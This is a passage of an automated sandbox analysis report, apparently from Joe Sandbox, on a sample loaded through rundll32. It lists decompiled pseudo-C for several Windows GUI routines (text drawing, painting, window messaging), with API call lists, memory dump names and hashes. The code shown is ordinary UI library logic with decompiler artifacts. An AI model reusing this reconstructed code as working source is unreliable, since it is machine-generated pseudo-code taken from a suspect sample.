                          • MulDiv.KERNEL32(?,?,00000000), ref: 02815B79
                          • MulDiv.KERNEL32(?,?,00000000), ref: 02815B9F
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f418a878a34993f2f1d8bb74979b572ecbc5bc6a8e3f39b1ef413d5a8819d4a6
                          • Instruction ID: 24a1b92fdc1fbf5576dd5bf4e400ec518ff416eeb83b638da1305349c0b61b74
                          • Opcode Fuzzy Hash: f418a878a34993f2f1d8bb74979b572ecbc5bc6a8e3f39b1ef413d5a8819d4a6
                          • Instruction Fuzzy Hash: 82817078A04108EFDB45DBA8C588F9DB7F9AF48304F6581E4E508DB3A2C735AE45DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0282394C Relevance: 7.7, APIs: 5, Instructions: 162COMMON
                          Download Yara Rule
                          C-Code - Quality: 85%
                          			E0282394C(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				struct tagRECT _v32;
				void* _t53;
				int _t63;
				CHAR* _t65;
				void* _t76;
				void* _t78;
				int _t89;
				CHAR* _t91;
				int _t117;
				intOrPtr _t127;
				void* _t139;
				void* _t144;
				char _t153;

				_t120 = __ecx;
				_t143 = _t144;
				_v16 = 0;
				_v12 = __ecx;
				_v8 = __edx;
				_t139 = __eax;
				_t117 = _a4;
				_push(_t144);
				_push(0x2823b30);
				_push( *[fs:eax]);
				 *[fs:eax] = _t144 + 0xffffffe4;
				_t53 = E028258E4(__eax);
				_t135 = _t53;
				if(_t53 != 0 && E02826F20(_t135) != 0) {
					if((_t117 & 0x00000000) != 0) {
						__eflags = (_t117 & 0x00000002) - 2;
						if((_t117 & 0x00000002) == 2) {
							_t117 = _t117 & 0xfffffffd;
							__eflags = _t117;
						}
					} else {
						_t117 = _t117 & 0xffffffff | 0x00000002;
					}
					_t117 = _t117 | 0x00020000;
				}
				E027D4180( &_v16, _v12);
				if((_t117 & 0x00000004) == 0) {
					L12:
					E027D44F4(_v16, 0x2823b54);
					if(_t153 != 0) {
						E027F7DC0( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
						__eflags =  *((char*)(_t139 + 0x3a));
						if( *((char*)(_t139 + 0x3a)) != 0) {
							_t136 =  *((intOrPtr*)(_v8 + 0xc));
							__eflags = E027F7798( *((intOrPtr*)(_v8 + 0xc))) |  *0x2823b58;
							E027F77A4( *((intOrPtr*)(_v8 + 0xc)), E027F7798( *((intOrPtr*)(_v8 + 0xc))) |  *0x2823b58, _t136, _t139, _t143);
						}
						__eflags =  *((char*)(_t139 + 0x39));
						if( *((char*)(_t139 + 0x39)) != 0) {
							L24:
							_t63 = E027D43A8(_v16);
							_t65 = E027D45A8(_v16);
							DrawTextA(E027F84EC(_v8), _t65, _t63, _a12, _t117);
							L25:
							_pop(_t127);
							 *[fs:eax] = _t127;
							_push(0x2823b37);
							return E027D40E8( &_v16);
						} else {
							__eflags = _a8;
							if(_a8 == 0) {
								OffsetRect(_a12, 1, 1);
								E027F74D8( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
								_t89 = E027D43A8(_v16);
								_t91 = E027D45A8(_v16);
								DrawTextA(E027F84EC(_v8), _t91, _t89, _a12, _t117);
								OffsetRect(_a12, 0xffffffff, 0xffffffff);
							}
							__eflags = _a8;
							if(_a8 == 0) {
								L23:
								E027F74D8( *((intOrPtr*)(_v8 + 0xc)), 0xff000010);
							} else {
								_t76 = E027F7018(0xff00000d);
								_t78 = E027F7018(0xff000010);
								__eflags = _t76 - _t78;
								if(_t76 != _t78) {
									goto L23;
								}
								E027F74D8( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
							}
							goto L24;
						}
					}
					if((_t117 & 0x00000004) == 0) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v32.top = _v32.top + 4;
						DrawEdge(E027F84EC(_v8),  &_v32, 6, 2);
					}
					goto L25;
				} else {
					if(_v16 == 0) {
						L11:
						E027D43B0( &_v16, 0x2823b48);
						goto L12;
					}
					if( *_v16 != 0x26) {
						goto L12;
					}
					_t153 =  *((char*)(_v16 + 1));
					if(_t153 != 0) {
						goto L12;
					}
					goto L11;
				}
			}



















                          0x0282394c
                          0x0282394d
                          0x02823957
                          0x0282395a
                          0x0282395d
                          0x02823960
                          0x02823962
                          0x02823967
                          0x02823968
                          0x0282396d
                          0x02823970
                          0x02823975
                          0x0282397a
                          0x0282397e
                          0x0282398e
                          0x0282399d
                          0x028239a0
                          0x028239a5
                          0x028239a5
                          0x028239a5
                          0x02823990
                          0x02823993
                          0x02823993
                          0x028239a8
                          0x028239a8
                          0x028239b4
                          0x028239bc
                          0x028239e2
                          0x028239ea
                          0x028239ef
                          0x02823a2d
                          0x02823a32
                          0x02823a36
                          0x02823a3b
                          0x02823a47
                          0x02823a4f
                          0x02823a4f
                          0x02823a54
                          0x02823a58
                          0x02823af5
                          0x02823afd
                          0x02823b06
                          0x02823b15
                          0x02823b1a
                          0x02823b1c
                          0x02823b1f
                          0x02823b22
                          0x02823b2f
                          0x02823a5e
                          0x02823a5e
                          0x02823a62
                          0x02823a6c
                          0x02823a7c
                          0x02823a89
                          0x02823a92
                          0x02823aa1
                          0x02823aae
                          0x02823aae
                          0x02823ab3
                          0x02823ab7
                          0x02823ae5
                          0x02823af0
                          0x02823ab9
                          0x02823abe
                          0x02823aca
                          0x02823acf
                          0x02823ad1
                          0x00000000
                          0x00000000
                          0x02823ade
                          0x02823ade
                          0x00000000
                          0x02823ab7
                          0x02823a58
                          0x028239f4
                          0x02823a02
                          0x02823a03
                          0x02823a04
                          0x02823a05
                          0x02823a06
                          0x02823a1b
                          0x02823a1b
                          0x00000000
                          0x028239be
                          0x028239c2
                          0x028239d5
                          0x028239dd
                          0x00000000
                          0x028239dd
                          0x028239ca
                          0x00000000
                          0x00000000
                          0x028239cf
                          0x028239d3
                          0x00000000
                          0x00000000
                          0x00000000
                          0x028239d3

                          APIs
                          • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 02823A1B
                          • OffsetRect.USER32(?,00000001,00000001), ref: 02823A6C
                          • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 02823AA1
                          • OffsetRect.USER32(?,000000FF,000000FF), ref: 02823AAE
                          • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 02823B15
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Draw$OffsetRectText$Edge
                          • String ID:
                          • API String ID: 3610532707-0
                          • Opcode ID: 84480871a03e5ae679b61aad76d86e0f66f6f3d7f8f01068e4b85c5a9274c8d3
                          • Instruction ID: 3b5150f00c1ff921d93db226ff0fa3927f8449e8f05ba353aa255a19003b0a3d
                          • Opcode Fuzzy Hash: 84480871a03e5ae679b61aad76d86e0f66f6f3d7f8f01068e4b85c5a9274c8d3
                          • Instruction Fuzzy Hash: 9D519378E04218AFDB52EFA8C895B9EB7FAAF05320F548191F954E7390C739DD848B11
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0282B09C Relevance: 7.6, APIs: 5, Instructions: 139threadCOMMON
                          Download Yara Rule
                          C-Code - Quality: 96%
                          			E0282B09C(intOrPtr __eax, void* __ecx, intOrPtr _a4) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				struct HWND__* _v24;
				intOrPtr _v28;
				void* _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				struct HWND__* _t53;
				intOrPtr _t55;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t94;
				intOrPtr _t99;
				intOrPtr _t102;
				void* _t103;
				intOrPtr* _t105;
				intOrPtr _t107;
				intOrPtr _t111;
				intOrPtr _t113;
				struct HWND__* _t114;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t118;

				_t103 = __ecx;
				_t102 = __eax;
				_v5 = 1;
				_t114 = E0282B4EC(_a4 + 0xfffffff7);
				_v24 = _t114;
				_t53 = GetWindow(_t114, 4);
				_t105 =  *0x28645d4; // 0x2865b58
				_t4 =  *_t105 + 0x30; // 0x0
				if(_t53 ==  *_t4) {
					L6:
					if(_v24 == 0) {
						L25:
						return _v5;
					}
					_t115 = _t102;
					while(1) {
						_t55 =  *((intOrPtr*)(_t115 + 0x30));
						if(_t55 == 0) {
							break;
						}
						_t115 = _t55;
					}
					_t113 = E02833F7C(_t115);
					_v28 = _t113;
					if(_t113 == _v24) {
						goto L25;
					}
					_t13 = _a4 - 0x10; // 0xe87d83e8
					_t60 =  *((intOrPtr*)( *_t13 + 0x30));
					if(_t60 == 0) {
						_t19 = _a4 - 0x10; // 0xe87d83e8
						_t107 =  *0x282964c; // 0x2829698
						__eflags = E027D3398( *_t19, _t107);
						if(__eflags == 0) {
							__eflags = 0;
							_v32 = 0;
						} else {
							_t21 = _a4 - 0x10; // 0xe87d83e8
							_v32 = E02833F7C( *_t21);
						}
						L19:
						_v12 = 0;
						_t65 = _a4;
						_v20 =  *((intOrPtr*)(_t65 - 9));
						_v16 =  *((intOrPtr*)(_t65 - 5));
						EnumThreadWindows(GetCurrentThreadId(), E0282B030,  &_v32);
						_t127 = _v12;
						if(_v12 == 0) {
							goto L25;
						}
						GetWindowRect(_v24,  &_v48);
						_push(_a4 + 0xfffffff7);
						_push(_a4 - 1);
						E027D3408(_t102, _t127);
						_t79 =  *0x2865bb4; // 0x0
						_t111 =  *0x28283cc; // 0x2828418
						if(E027D3398(_t79, _t111) == 0) {
							L23:
							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
								_v5 = 0;
							}
							goto L25;
						}
						_t85 =  *0x2865bb4; // 0x0
						if( *((intOrPtr*)( *((intOrPtr*)(_t85 + 0x38)) + 0xa0)) == 0) {
							goto L23;
						}
						_t87 =  *0x2865bb4; // 0x0
						if(E02833F7C( *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x38)) + 0xa0))) == _v24) {
							goto L25;
						}
						goto L23;
					}
					_t117 = _t60;
					while(1) {
						_t94 =  *((intOrPtr*)(_t117 + 0x30));
						if(_t94 == 0) {
							break;
						}
						_t117 = _t94;
					}
					_v32 = E02833F7C(_t117);
					goto L19;
				}
				_t118 = E0282A5B0(_v24, _t103);
				if(_t118 == 0) {
					goto L25;
				} else {
					while(1) {
						_t99 =  *((intOrPtr*)(_t118 + 0x30));
						if(_t99 == 0) {
							break;
						}
						_t118 = _t99;
					}
					_v24 = E02833F7C(_t118);
					goto L6;
				}
			}































                          0x0282b09c
                          0x0282b0a5
                          0x0282b0a7
                          0x0282b0b6
                          0x0282b0b8
                          0x0282b0be
                          0x0282b0c3
                          0x0282b0cb
                          0x0282b0ce
                          0x0282b0f7
                          0x0282b0fb
                          0x0282b22a
                          0x0282b233
                          0x0282b233
                          0x0282b101
                          0x0282b107
                          0x0282b107
                          0x0282b10c
                          0x00000000
                          0x00000000
                          0x0282b105
                          0x0282b105
                          0x0282b115
                          0x0282b117
                          0x0282b11d
                          0x00000000
                          0x00000000
                          0x0282b126
                          0x0282b129
                          0x0282b12e
                          0x0282b14f
                          0x0282b152
                          0x0282b15d
                          0x0282b15f
                          0x0282b171
                          0x0282b173
                          0x0282b161
                          0x0282b164
                          0x0282b16c
                          0x0282b16c
                          0x0282b176
                          0x0282b176
                          0x0282b17a
                          0x0282b180
                          0x0282b186
                          0x0282b198
                          0x0282b19d
                          0x0282b1a1
                          0x00000000
                          0x00000000
                          0x0282b1af
                          0x0282b1ba
                          0x0282b1bf
                          0x0282b1cf
                          0x0282b1d4
                          0x0282b1d9
                          0x0282b1e6
                          0x0282b211
                          0x0282b224
                          0x0282b226
                          0x0282b226
                          0x00000000
                          0x0282b224
                          0x0282b1e8
                          0x0282b1f7
                          0x00000000
                          0x00000000
                          0x0282b1f9
                          0x0282b20f
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0282b20f
                          0x0282b133
                          0x0282b139
                          0x0282b139
                          0x0282b13e
                          0x00000000
                          0x00000000
                          0x0282b137
                          0x0282b137
                          0x0282b147
                          0x00000000
                          0x0282b147
                          0x0282b0d8
                          0x0282b0dc
                          0x00000000
                          0x0282b0e2
                          0x0282b0e6
                          0x0282b0e6
                          0x0282b0eb
                          0x00000000
                          0x00000000
                          0x0282b0e4
                          0x0282b0e4
                          0x0282b0f4
                          0x00000000
                          0x0282b0f4

                          APIs
                            • Part of subcall function 0282B4EC: WindowFromPoint.USER32(0282B2C6,02865BD8,00000000,0282B0B6,?,02865BC0,?), ref: 0282B4F2
                            • Part of subcall function 0282B4EC: GetParent.USER32(00000000), ref: 0282B509
                          • GetWindow.USER32(00000000,00000004), ref: 0282B0BE
                          • GetCurrentThreadId.KERNEL32 ref: 0282B192
                          • EnumThreadWindows.USER32(00000000,0282B030,?), ref: 0282B198
                          • GetWindowRect.USER32(00000000,?), ref: 0282B1AF
                          • IntersectRect.USER32(?,?,?), ref: 0282B21D
                            • Part of subcall function 0282A5B0: GetWindowThreadProcessId.USER32(?), ref: 0282A5BD
                            • Part of subcall function 0282A5B0: GetCurrentProcessId.KERNEL32(?,00000000,00000000,028272D1,00000000,02826E34,?,00000000,028175E4,00000000), ref: 0282A5C6
                            • Part of subcall function 0282A5B0: GlobalFindAtomA.KERNEL32(00000000), ref: 0282A5DB
                            • Part of subcall function 0282A5B0: GetPropA.USER32(?,00000000), ref: 0282A5F2
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Window$Thread$CurrentProcessRect$AtomEnumFindFromGlobalIntersectParentPointPropWindows
                          • String ID:
                          • API String ID: 2202917067-0
                          • Opcode ID: 011684b2327cc9ae03c3aee63a0040d312c215c899ba1b52cdbcdcc8e663f22c
                          • Instruction ID: f58c3698549546d2d4c6d3f61e5b0c0abbf59c8300b7748e69ad2a0d888e8073
                          • Opcode Fuzzy Hash: 011684b2327cc9ae03c3aee63a0040d312c215c899ba1b52cdbcdcc8e663f22c
                          • Instruction Fuzzy Hash: 14513E3DA012299FCB11DFA8D484BAEB7F5AF08358F548595E818EB350E730E985CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0280CF1C Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                          Download Yara Rule
                          C-Code - Quality: 77%
                          			E0280CF1C(intOrPtr* __eax, void* __ebx, signed int __ecx, struct tagRECT* __edx, void* __edi, void* __esi) {
				char _v8;
				int _t40;
				CHAR* _t42;
				int _t54;
				CHAR* _t56;
				int _t65;
				CHAR* _t67;
				intOrPtr* _t76;
				intOrPtr _t86;
				struct tagRECT* _t91;
				signed int _t93;
				int _t94;
				intOrPtr _t97;
				signed int _t104;

				_push(0);
				_t93 = __ecx;
				_t91 = __edx;
				_t76 = __eax;
				_push(_t97);
				_push(0x280d072);
				_push( *[fs:eax]);
				 *[fs:eax] = _t97;
				 *((intOrPtr*)( *__eax + 0x90))();
				if((__ecx & 0x00000400) != 0 && (_v8 == 0 ||  *((char*)(__eax + 0x170)) != 0 &&  *_v8 == 0x26 &&  *((char*)(_v8 + 1)) == 0)) {
					E027D43B0( &_v8, 0x280d088);
				}
				if( *((char*)(_t76 + 0x170)) == 0) {
					_t104 = _t93;
				}
				_t94 = E0282FA68(_t76, _t93, _t104);
				E027F83E8( *((intOrPtr*)(_t76 + 0x160)));
				if( *((intOrPtr*)( *_t76 + 0x50))() != 0) {
					_t40 = E027D43A8(_v8);
					_t42 = E027D45A8(_v8);
					DrawTextA(E027F84EC( *((intOrPtr*)(_t76 + 0x160))), _t42, _t40, _t91, _t94);
				} else {
					OffsetRect(_t91, 1, 1);
					E027F74D8( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0xff000014);
					_t54 = E027D43A8(_v8);
					_t56 = E027D45A8(_v8);
					DrawTextA(E027F84EC( *((intOrPtr*)(_t76 + 0x160))), _t56, _t54, _t91, _t94);
					OffsetRect(_t91, 0xffffffff, 0xffffffff);
					E027F74D8( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0xff000010);
					_t65 = E027D43A8(_v8);
					_t67 = E027D45A8(_v8);
					DrawTextA(E027F84EC( *((intOrPtr*)(_t76 + 0x160))), _t67, _t65, _t91, _t94);
				}
				_pop(_t86);
				 *[fs:eax] = _t86;
				_push(0x280d079);
				return E027D40E8( &_v8);
			}

















                          0x0280cf1f
                          0x0280cf24
                          0x0280cf26
                          0x0280cf28
                          0x0280cf2c
                          0x0280cf2d
                          0x0280cf32
                          0x0280cf35
                          0x0280cf3f
                          0x0280cf4b
                          0x0280cf75
                          0x0280cf75
                          0x0280cf81
                          0x0280cf83
                          0x0280cf83
                          0x0280cf92
                          0x0280cf9d
                          0x0280cfab
                          0x0280d03c
                          0x0280d045
                          0x0280d057
                          0x0280cfb1
                          0x0280cfb6
                          0x0280cfc9
                          0x0280cfd3
                          0x0280cfdc
                          0x0280cfee
                          0x0280cff8
                          0x0280d00b
                          0x0280d015
                          0x0280d01e
                          0x0280d030
                          0x0280d030
                          0x0280d05e
                          0x0280d061
                          0x0280d064
                          0x0280d071

                          APIs
                          • OffsetRect.USER32(?,00000001,00000001), ref: 0280CFB6
                          • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0280CFEE
                          • OffsetRect.USER32(?,000000FF,000000FF), ref: 0280CFF8
                          • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0280D030
                          • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0280D057
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: DrawText$OffsetRect
                          • String ID:
                          • API String ID: 1886049697-0
                          • Opcode ID: b22fd8b2eafbab35a4dac19df8e143e16bcc4852d413cbcde3031150f173032a
                          • Instruction ID: 99a0b624cef64aece5bdd370b65f583bbe835fe9237c72ab5f2c35ed88408c21
                          • Opcode Fuzzy Hash: b22fd8b2eafbab35a4dac19df8e143e16bcc4852d413cbcde3031150f173032a
                          • Instruction Fuzzy Hash: 49314F34A04204AFDB52EB69CD89F9FB7BEAF45310F1541B1B808EB2A5CB709D05DB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02831C30 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                          Download Yara Rule
                          C-Code - Quality: 86%
                          			E02831C30(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagPAINTSTRUCT _v84;
				intOrPtr _t55;
				void* _t64;
				struct HDC__* _t75;
				intOrPtr _t84;
				void* _t95;
				void* _t96;
				void* _t98;
				void* _t100;
				void* _t101;
				intOrPtr _t102;

				_t100 = _t101;
				_t102 = _t101 + 0xffffffb0;
				_v12 = __edx;
				_v8 = __eax;
				_t4 = _v12 + 4; // 0x55dfebff
				_t75 =  *_t4;
				if(_t75 == 0) {
					_t75 = BeginPaint(E02833F7C(_v8),  &_v84);
				}
				_push(_t100);
				_push(0x2831d50);
				_push( *[fs:edx]);
				 *[fs:edx] = _t102;
				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
					_v20 = SaveDC(_t75);
					_v16 = 2;
					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
					if(_t95 >= 0) {
						_t96 = _t95 + 1;
						_t98 = 0;
						do {
							_t64 = E027EB1E0( *((intOrPtr*)(_v8 + 0x198)), _t98);
							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
									goto L11;
								} else {
									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
									if(_v16 != 1) {
										goto L11;
									}
								}
							} else {
								goto L11;
							}
							goto L12;
							L11:
							_t98 = _t98 + 1;
							_t96 = _t96 - 1;
						} while (_t96 != 0);
					}
					L12:
					if(_v16 != 1) {
						 *((intOrPtr*)( *_v8 + 0xb8))();
					}
					RestoreDC(_t75, _v20);
				} else {
					 *((intOrPtr*)( *_v8 + 0xb8))();
				}
				E02831D88(_v8, 0, _t75);
				_pop(_t84);
				 *[fs:eax] = _t84;
				_push(0x2831d57);
				_t55 = _v12;
				if( *((intOrPtr*)(_t55 + 4)) == 0) {
					return EndPaint(E02833F7C(_v8),  &_v84);
				}
				return _t55;
			}


















                          0x02831c31
                          0x02831c33
                          0x02831c39
                          0x02831c3c
                          0x02831c42
                          0x02831c42
                          0x02831c47
                          0x02831c5b
                          0x02831c5b
                          0x02831c5f
                          0x02831c60
                          0x02831c65
                          0x02831c68
                          0x02831c75
                          0x02831c8f
                          0x02831c92
                          0x02831ca5
                          0x02831ca8
                          0x02831caa
                          0x02831cab
                          0x02831cad
                          0x02831cb8
                          0x02831cc1
                          0x02831cd3
                          0x00000000
                          0x02831cd5
                          0x02831cf1
                          0x02831cf8
                          0x00000000
                          0x00000000
                          0x02831cf8
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x02831cfa
                          0x02831cfa
                          0x02831cfb
                          0x02831cfb
                          0x02831cad
                          0x02831cfe
                          0x02831d02
                          0x02831d0b
                          0x02831d0b
                          0x02831d16
                          0x02831c77
                          0x02831c7e
                          0x02831c7e
                          0x02831d22
                          0x02831d29
                          0x02831d2c
                          0x02831d2f
                          0x02831d34
                          0x02831d3b
                          0x00000000
                          0x02831d4a
                          0x02831d4f

                          APIs
                          • BeginPaint.USER32(00000000,?), ref: 02831C56
                          • SaveDC.GDI32(55DFEBFF), ref: 02831C8A
                          • ExcludeClipRect.GDI32(55DFEBFF,?,?,?,?,55DFEBFF), ref: 02831CEC
                          • RestoreDC.GDI32(55DFEBFF,02816B8B), ref: 02831D16
                          • EndPaint.USER32(00000000,?,02831D57), ref: 02831D4A
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Paint$BeginClipExcludeRectRestoreSave
                          • String ID:
                          • API String ID: 3808407030-0
                          • Opcode ID: 904a6d175112252cc48b1776a50908ee566eb58b6e925593c7e8c74bba6fec0a
                          • Instruction ID: e33fddabe3a605004e0576a2fa54eef2e72be81473e182b96906d3c9a27218fb
                          • Opcode Fuzzy Hash: 904a6d175112252cc48b1776a50908ee566eb58b6e925593c7e8c74bba6fec0a
                          • Instruction Fuzzy Hash: 78413078A002049FDB16DBA9C888FADB7F9AF49714F1580A8D508D7261D735AD45CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0281E2A4 Relevance: 7.6, APIs: 5, Instructions: 90windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0281E2A4(intOrPtr __eax, intOrPtr* __edx) {
				intOrPtr _v8;
				intOrPtr* _v12;
				char _v13;
				struct HWND__* _v20;
				void* _t86;

				_v12 = __edx;
				_v8 = __eax;
				_v13 = 0;
				if( *((intOrPtr*)(_v12 + 4)) < 0x100 ||  *((intOrPtr*)(_v12 + 4)) > 0x108) {
					L16:
					return _v13;
				} else {
					_v20 = GetCapture();
					if(_v20 != 0) {
						if(GetWindowLongA(_v20, 0xfffffffa) ==  *0x2865668) {
							_t38 = _v12 + 0xc; // 0x84fffffc
							_t40 = _v12 + 8; // 0xe1e8fc45
							_t42 = _v12 + 4; // 0x8bf8558b
							if(SendMessageA(_v20,  *_t42 + 0xbc00,  *_t40,  *_t38) != 0) {
								_v13 = 1;
							}
						}
						goto L16;
					}
					_v20 =  *_v12;
					if( *((intOrPtr*)(_v8 + 0x44)) == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x44)) + 0x254)) != _v20) {
						goto L7;
						L7:
						if(E0282A5B0(_v20, _t86) != 0 || _v20 == 0) {
							if(_v20 == 0) {
								_v20 =  *_v12;
							}
							goto L11;
						} else {
							_v20 = GetParent(_v20);
							goto L7;
						}
					} else {
						_v20 = E02833F7C( *((intOrPtr*)(_v8 + 0x44)));
						L11:
						_t29 = _v12 + 0xc; // 0x84fffffc
						_t31 = _v12 + 8; // 0xe1e8fc45
						_t33 = _v12 + 4; // 0x8bf8558b
						if(SendMessageA(_v20,  *_t33 + 0xbc00,  *_t31,  *_t29) != 0) {
							_v13 = 1;
						}
						goto L16;
					}
				}
			}








                          0x0281e2aa
                          0x0281e2ad
                          0x0281e2b0
                          0x0281e2be
                          0x0281e3af
                          0x0281e3b5
                          0x0281e2d4
                          0x0281e2d9
                          0x0281e2e0
                          0x0281e382
                          0x0281e387
                          0x0281e38e
                          0x0281e395
                          0x0281e3a9
                          0x0281e3ab
                          0x0281e3ab
                          0x0281e3a9
                          0x00000000
                          0x0281e382
                          0x0281e2eb
                          0x0281e2f5
                          0x00000000
                          0x0281e324
                          0x0281e32e
                          0x0281e33a
                          0x0281e341
                          0x0281e341
                          0x00000000
                          0x0281e318
                          0x0281e321
                          0x00000000
                          0x0281e321
                          0x0281e308
                          0x0281e313
                          0x0281e344
                          0x0281e347
                          0x0281e34e
                          0x0281e355
                          0x0281e369
                          0x0281e36b
                          0x0281e36b
                          0x00000000
                          0x0281e369
                          0x0281e2f5

                          APIs
                          • GetCapture.USER32 ref: 0281E2D4
                          • SendMessageA.USER32(00000000,8BF7998B,E1E8FC45,84FFFFFC), ref: 0281E362
                          • GetWindowLongA.USER32(00000000,000000FA), ref: 0281E377
                          • SendMessageA.USER32(00000000,8BF7998B,E1E8FC45,84FFFFFC), ref: 0281E3A2
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: MessageSend$CaptureLongWindow
                          • String ID:
                          • API String ID: 1158686931-0
                          • Opcode ID: a785a4118dc997d473d9ac3d0ba65dfc96ba26484e8d032917a820de5640b9e2
                          • Instruction ID: 67a34a6217db03ce40fbbc6bc8682de2f8fe3b4a11e858b3685d95bd9e75743d
                          • Opcode Fuzzy Hash: a785a4118dc997d473d9ac3d0ba65dfc96ba26484e8d032917a820de5640b9e2
                          • Instruction Fuzzy Hash: 2C419778A00259DFDB50DB98C988FADBBF9BF08314F094594E958E7391D374E980CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 028057AC Relevance: 7.6, APIs: 5, Instructions: 86COMMON
